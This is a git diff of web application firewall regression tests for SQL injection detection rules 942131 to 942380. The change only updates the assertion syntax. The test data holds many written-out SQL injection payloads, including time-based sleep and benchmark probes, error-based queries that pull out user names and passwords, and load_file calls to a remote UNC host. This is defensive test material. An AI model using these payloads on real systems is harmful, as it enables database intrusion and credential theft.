"942131" + log: + expect_ids: [942131] - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: @@ -103,4 +109,5 @@ tests: data: "a='1' not regexp '1'" version: HTTP/1.1 output: - no_log_contains: id "942131" + log: + no_expect_ids: [942131] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index d839c8ee4..03dad9402 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?sql_table=pg_catalog" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -33,7 +34,8 @@ tests: data: "INFORMATION_SCHEMA" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -49,7 +51,8 @@ tests: data: "database(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -65,7 +68,8 @@ tests: data: "db_name(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -81,7 +85,8 @@ tests: data: "DaTaBasE(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -97,7 +102,8 @@ tests: data: "InFoRmaTioN_ScHemA" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -113,7 +119,8 @@ tests: data: "DB_NAME(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -129,7 +136,8 @@ tests: data: "tempdb" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -145,7 +153,8 @@ tests: data: "msdb" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 10 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -161,7 +170,8 @@ tests: data: "mysql.db" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 11 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -177,7 +187,8 @@ tests: data: "MSysAccessObjects" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 12 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -193,7 +204,8 @@ tests: data: "Northwind" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 13 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -209,7 +221,8 @@ tests: data: "northwind" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 14 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -225,7 +238,8 @@ tests: data: "SCHEMA_NAME" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 15 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -241,7 +255,8 @@ tests: data: "DATABASE(" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 16 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -257,7 +272,8 @@ tests: data: "schema_name" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] - test_id: 17 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -273,4 +289,5 @@ tests: data: "information_schema" version: HTTP/1.0 output: - log_contains: id "942140" + log: + expect_ids: [942140] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml index 82e83cec0..9f3347554 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -19,7 +19,8 @@ tests: data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=1' and sleep(9) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 3 desc: "Simple SQL injection" stages: @@ -51,7 +53,8 @@ tests: data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 4 desc: "Advanced SQL injection" stages: @@ -67,7 +70,8 @@ tests: data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 5 stages: - input: @@ -82,7 +86,8 @@ tests: data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 6 desc: "Simple SQL injection" stages: @@ -98,7 +103,8 @@ tests: data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 7 desc: "Simple SQL injection" stages: @@ -114,7 +120,8 @@ tests: data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 8 desc: "Advanced SQL injection" stages: @@ -130,7 +137,8 @@ tests: data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 9 desc: "Simple injection" stages: @@ -146,7 +154,8 @@ tests: data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 10 desc: "Advanced SQL injection" stages: @@ -162,7 +171,8 @@ tests: data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 11 desc: "Advanced SQL injection" stages: @@ -178,7 +188,8 @@ tests: data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 12 desc: "Simple injection" stages: @@ -194,7 +205,8 @@ tests: data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 13 desc: "Simple injection" stages: @@ -210,7 +222,8 @@ tests: data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 14 desc: "Advanced injection" stages: @@ -226,7 +239,8 @@ tests: data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 15 desc: "Advanced injection" stages: @@ -242,7 +256,8 @@ tests: data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 16 desc: "Simple injection" stages: @@ -258,7 +273,8 @@ tests: data: "var=\\foobar.txt\" or sleep(4) #" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 17 desc: "SQLite 'json' function" stages: @@ -274,7 +290,8 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 18 desc: "SQLite 'json_valid' function" stages: @@ -290,7 +307,8 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] - test_id: 19 desc: "SQLite 'glob' function" stages: @@ -306,4 +324,5 @@ tests: data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" version: HTTP/1.0 output: - log_contains: id "942150" + log: + expect_ids: [942150] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index baff15efd..cd940dd78 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -19,7 +19,8 @@ tests: data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 2 desc: "Simple SQL injection" stages: @@ -35,7 +36,8 @@ tests: data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 3 desc: "Advanced SQL injection" stages: @@ -51,7 +53,8 @@ tests: data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: @@ -67,7 +70,8 @@ tests: data: "var=, FIND_IN_SET('22', Category )" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: @@ -83,7 +87,8 @@ tests: data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: @@ -99,7 +104,8 @@ tests: data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: @@ -115,7 +121,8 @@ tests: data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: @@ -130,7 +137,8 @@ tests: uri: "/get/index.php?id=starts_with(password,'a')::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: @@ -145,7 +153,8 @@ tests: uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: @@ -160,7 +169,8 @@ tests: uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] - test_id: 11 desc: "SQL injection using unistr() function" stages: @@ -175,4 +185,5 @@ tests: uri: "/get/index.php?id=unistr(password)::int" version: HTTP/1.0 output: - log_contains: id "942151" + log: + expect_ids: [942151] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 2d6ce1b1e..80057834e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] - test_id: 2 desc: "SQL injection in request header User-Agent" stages: @@ -33,7 +34,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] - test_id: 3 desc: "SQL injection in request header User-Agent" stages: @@ -48,4 +50,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942152" + log: + expect_ids: [942152] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index b499f63f2..fb27be346 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?sql_table=sleep%28534543%29" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -33,7 +34,8 @@ tests: data: "sleEP(3)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -49,7 +51,8 @@ tests: data: "sleep(5000)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -65,7 +68,8 @@ tests: data: "BENChmARk(2999/**/999,Md5(NoW()" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -81,7 +85,8 @@ tests: data: "BEncHMARk(2999999,Md5(NoW('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -97,7 +102,8 @@ tests: data: "BENCHMARK(5000000,MD5(0x48416166)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -113,7 +119,8 @@ tests: data: "benchmark(3000000,M%445(4)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -129,7 +136,8 @@ tests: data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: @@ -145,7 +153,8 @@ tests: data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" stages: @@ -160,4 +169,5 @@ tests: uri: "/get/if(now()=sysdate(),sleep(12),0)" version: HTTP/1.0 output: - log_contains: id "942160" + log: + expect_ids: [942160] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 63b5b547e..114ff39c9 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?var=%3B%20sleep%280%29" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: @@ -47,7 +49,8 @@ tests: uri: "/get?var=I%20sleep%20well%21" version: HTTP/1.0 output: - no_log_contains: id "942170" + log: + no_expect_ids: [942170] - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: @@ -62,4 +65,5 @@ tests: uri: "/get?test=select+if(x" version: HTTP/1.0 output: - log_contains: id "942170" + log: + expect_ids: [942170] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index aba2a2cdc..5969385cb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?var=3%27%20%27%201" version: HTTP/1.0 output: - log_contains: id "942180" + log: + expect_ids: [942180] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,7 +35,8 @@ tests: version: HTTP/1.0 data: "javascript:\"/*'/*`/*-->%+-][\w-]+[^\w\s]+[\"'`][^,] @@ -170,7 +178,8 @@ tests: data: "var=>foo##'." version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] - test_id: 10 stages: - input: @@ -184,7 +193,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: @@ -199,4 +209,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942370" + log: + expect_ids: [942370] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index f28a16c3d..ee0cf1b02 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -18,7 +18,8 @@ tests: data: "from `db_miwf`.`sys_refindex` limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "from `information_schema`.tables limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "ORder by" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 5 desc: "SQL Injection Attack" stages: @@ -82,7 +86,8 @@ tests: data: "ordeR by" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 9 desc: "SQL Injection Attack" stages: @@ -146,7 +154,8 @@ tests: data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 11 desc: "SQL Injection Attack" stages: @@ -178,7 +188,8 @@ tests: data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 12 desc: "SQL Injection Attack" stages: @@ -194,7 +205,8 @@ tests: data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 13 desc: "SQL Injection Attack" stages: @@ -210,7 +222,8 @@ tests: data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 14 desc: "SQL Injection Attack" stages: @@ -226,7 +239,8 @@ tests: data: "SELECT 'qzxjq'||(SELECT (CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 15 desc: "SQL Injection Attack" stages: @@ -242,7 +256,8 @@ tests: data: "execute php" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 16 desc: "SQL Injection Attack" stages: @@ -258,7 +273,8 @@ tests: data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 17 desc: "SQL Injection Attack" stages: @@ -274,7 +290,8 @@ tests: data: "Execute(" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 18 desc: "SQL Injection Attack" stages: @@ -290,7 +307,8 @@ tests: data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 19 desc: "SQL Injection Attack" stages: @@ -306,7 +324,8 @@ tests: data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 20 desc: "SQL Injection Attack" stages: @@ -322,7 +341,8 @@ tests: data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 21 desc: "SQL Injection Attack" stages: @@ -338,7 +358,8 @@ tests: data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 22 desc: "SQL Injection Attack" stages: @@ -354,7 +375,8 @@ tests: data: "HAVING+1%3D" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 23 desc: "SQL Injection Attack" stages: @@ -370,7 +392,8 @@ tests: data: "execute+elysi" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 24 desc: "SQL Injection Attack" stages: @@ -386,7 +409,8 @@ tests: data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 25 desc: "SQL Injection Attack" stages: @@ -402,7 +426,8 @@ tests: data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 26 desc: "SQL Injection Attack" stages: @@ -418,7 +443,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 27 desc: "SQL Injection Attack" stages: @@ -434,7 +460,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 28 desc: "SQL Injection Attack" stages: @@ -450,7 +477,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 29 desc: "SQL Injection Attack" stages: @@ -466,7 +494,8 @@ tests: data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 30 desc: "SQL Injection Attack" stages: @@ -482,7 +511,8 @@ tests: data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 31 desc: "SQL Injection Attack" stages: @@ -498,7 +528,8 @@ tests: data: "execute node_" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 32 desc: "SQL Injection Attack" stages: @@ -514,7 +545,8 @@ tests: data: "execute scald" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 33 desc: "SQL Injection Attack" stages: @@ -530,7 +562,8 @@ tests: data: "execute system" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 34 desc: "SQL Injection Attack" stages: @@ -546,7 +579,8 @@ tests: data: "execute user_" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 35 desc: "SQL Injection Attack" stages: @@ -562,7 +596,8 @@ tests: data: "execute views" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 36 desc: "SQL Injection Attack" stages: @@ -578,7 +613,8 @@ tests: data: "execute patha" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 37 desc: "SQL Injection Attack" stages: @@ -594,7 +630,8 @@ tests: data: "execute workb" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 38 desc: "SQL Injection Attack" stages: @@ -610,7 +647,8 @@ tests: data: "execute panel" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 39 desc: "SQL Injection Attack" stages: @@ -626,7 +664,8 @@ tests: data: "pay=from+information_schema.tables+where+1%3D2+limit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 40 desc: "SQL Injection Attack" stages: @@ -642,7 +681,8 @@ tests: data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 41 desc: "SQL Injection Attack" stages: @@ -658,7 +698,8 @@ tests: data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 42 desc: "SQL Injection Attack" stages: @@ -674,7 +715,8 @@ tests: data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 43 desc: "SQL Injection Attack" stages: @@ -690,7 +732,8 @@ tests: data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 44 desc: "SQL Injection Attack" stages: @@ -706,7 +749,8 @@ tests: data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" version: HTTP/1.0 output: - log_contains: id "942380" + log: + expect_ids: [942380] - test_id: 45 desc: "SQL Injection Attack: 